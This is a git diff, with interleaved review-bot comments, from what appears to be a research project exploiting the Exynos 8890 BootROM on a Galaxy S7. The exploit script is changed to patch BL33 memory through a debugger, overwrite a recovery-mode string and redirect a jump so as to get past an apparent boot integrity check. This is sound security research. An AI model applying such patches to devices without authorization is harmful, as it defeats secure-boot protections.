diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index cccd9bc..d6e99d4 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -350,3 +350,11 @@ At this point, we tried patching something in memory at BL33 - like we did at BL
 Possible integrity check of boot stages at BL2 and BL33. The decompilation is a bit broken, but we noticed that there are multiple calls to the same function, not just at the location where BL33 was returning from. With most specific things related to BL33 already done before this function. A similar verification seemed to have been done at ``0x02024e5c``. At this address, the same function was executed as at ``0x02024eec``, so instead of jumpingo into the function at ``0x02024eec``, we jumped into the function at ``0x02024e5c``. This worked, and allowed us to patch BL33, while continuing our boot flow. I assume, that we're doing an integrity check over BL2, while booting BL33.
+
+If removing the ROM/UFS Short, the phone will go into odin mode. And is visible in lsusb after booting:
+
+.. code:: bash
+
+    Bus 001 Device 043: ID 04e8:685d Samsung Electronics Co., Ltd GT-I9100 Phone [Galaxy S II] (Download mode)
+
+
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 06c9f4e..2476d32 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -763,8 +763,8 @@ class ExynosDevice():
         VBAR_EL3 = self.cd.arch_dbg.state.VBAR_EL3
         self.test_write_execute(0x11207010)
+        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         self.cd.restore_stack_and_jump(hijacked_fun)
-        time.sleep(2)
         # ==== Stage 4 BL2 ====
         bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
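Review bot: The added line `# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR` is commented-out code with no explanation, so the next reader cannot tell whether the LR override was abandoned or is still needed for the debugger hook; either delete it or replace it with a why-comment such as `# LR is deliberately not redirected to DEBUGGER_ADDR before this jump (TODO: document why)`. Dropping `time.sleep(2)` right after `restore_stack_and_jump(hijacked_fun)` also removes the only pause before the Stage 4 BL2 upload begins; if the target has to re-enumerate on USB after the jump, the following stage may now race it, so check that the code after the `bl2 = open(...)` line waits on the device itself (a connect or read with a timeout) rather than on the removed delay. The `open(...).read()` on the last context line additionally leaks the file handle; `with open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb") as f: bl2 = f.read()` would close it. The enclosing method starts and ends outside this hunk.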
@@ -799,17 +799,18 @@ class ExynosDevice():
         self.connect_device()
         self.usb_read(0x200) # GiAs
-        print(self.cd.arch_dbg.state.print_ctx())
-        # # Modify something in BL33
+        print(self.cd.arch_dbg.state.print_ctx())
         print(self.cd.memdump_region(0x8f063710, 0x8))
         self.cd.memwrite_region(0x8f063710, struct.pack('>I', 0x53614d74))
-        # Modify USB Recovyer mode string to something else
+        # Modify USB Recovyer mode string to: NFI Patched BL33
         self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33')
         print(self.cd.memdump_region(0x8f063710, 0x8))
-        # Do signature verification on BL2 instead of BL33 and proceed to boot (original is jump to 0x2024eec)
+        # Print state of x30/LR on screen
+        self.cd.memwrite_region(0x8f01dc08, struct.pack('>I', 0x7b432c91))
+        self.cd.restore_stack_and_jump(0x02024e5c)
         pass
diff --git a/source/exploit/ttbr0_el3.pkl b/source/exploit/ttbr0_el3.pkl
index 5bd383f..1365d50 100644
Binary files a/source/exploit/ttbr0_el3.pkl and b/source/exploit/ttbr0_el3.pkl differ
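Review bot: The new comment `# Modify USB Recovyer mode string to: NFI Patched BL33` does not match the bytes written on the next line, which decode to `NFI Patching BL33` (17 bytes), so the comment misdocuments the patch; write the literal readably and let it document itself, e.g. `self.cd.memwrite_region(0x8f06ab10, b'NFI Patching BL33')` under `# Overwrite the USB recovery-mode string (no NUL is written; verify the original string is at least 17 bytes)`. The added write of `struct.pack('>I', 0x7b432c91)` to `0x8f01dc08` is an undocumented magic word: `'>I'` places the bytes `7b 43 2c 91` in memory, which on a little-endian AArch64 target reads as the instruction word `0x912c437b` (apparently an `add x27, x27, #0xb10` — confirm against the disassembly), and the comment `# Print state of x30/LR on screen` should name which instruction is being replaced and why, so the offset can be re-derived for another firmware build. Both memwrite calls are also unconditional and unchecked; a `memdump_region` of the original bytes before each write, compared against the expected value, would catch a wrong image or base address before jumping into patched code at `0x02024e5c`. The enclosing method starts outside this hunk.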